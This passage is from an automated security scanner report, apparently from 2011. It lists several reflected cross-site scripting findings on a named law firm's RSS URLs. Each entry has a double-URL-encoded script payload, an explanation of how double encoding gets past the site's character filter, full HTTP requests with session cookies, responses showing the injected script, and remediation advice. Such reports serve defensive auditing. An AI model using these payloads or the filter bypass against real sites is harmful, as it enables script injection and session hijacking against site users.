The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee81a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed27cf73a803 was submitted in the REST URL parameter 3. This input was echoed as ee81a"><script>alert(1)</script>d27cf73a803 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/news_releases/rss.xmlee81a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed27cf73a803 HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/news_releases/rss.xmlee81a"><script>alert(1)</script>d27cf73a803" value="">
...[SNIP]...

4.220. http://www.wileyrein.com/rss/practices/Advertising/rss.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Advertising/rss.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32ca8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e73f8dfaacf9 was submitted in the REST URL parameter 1. This input was echoed as 32ca8"><script>alert(1)</script>73f8dfaacf9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss32ca8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e73f8dfaacf9/practices/Advertising/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss32ca8"><script>alert(1)</script>73f8dfaacf9/practices/Advertising/rss.xml" value="">
...[SNIP]...

4.221. http://www.wileyrein.com/rss/practices/Advertising/rss.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Advertising/rss.xml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5de32%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebc55ccc6862 was submitted in the REST URL parameter 2. This input was echoed as 5de32"><script>alert(1)</script>bc55ccc6862 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices5de32%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebc55ccc6862/Advertising/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices5de32"><script>alert(1)</script>bc55ccc6862/Advertising/rss.xml" value="">
...[SNIP]...

4.222. http://www.wileyrein.com/rss/practices/Advertising/rss.xml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Advertising/rss.xml

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80e2b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e09ca10697f5 was submitted in the REST URL parameter 3. This input was echoed as 80e2b"><script>alert(1)</script>09ca10697f5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Advertising80e2b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e09ca10697f5/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Advertising80e2b"><script>alert(1)</script>09ca10697f5/rss.xml" value="">
...[SNIP]...

4.223. http://www.wileyrein.com/rss/practices/Advertising/rss.xml [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Advertising/rss.xml

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86ab1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6017d2c2dff was submitted in the REST URL parameter 4. This input was echoed as 86ab1"><script>alert(1)</script>6017d2c2dff in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Advertising/rss.xml86ab1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6017d2c2dff HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Lan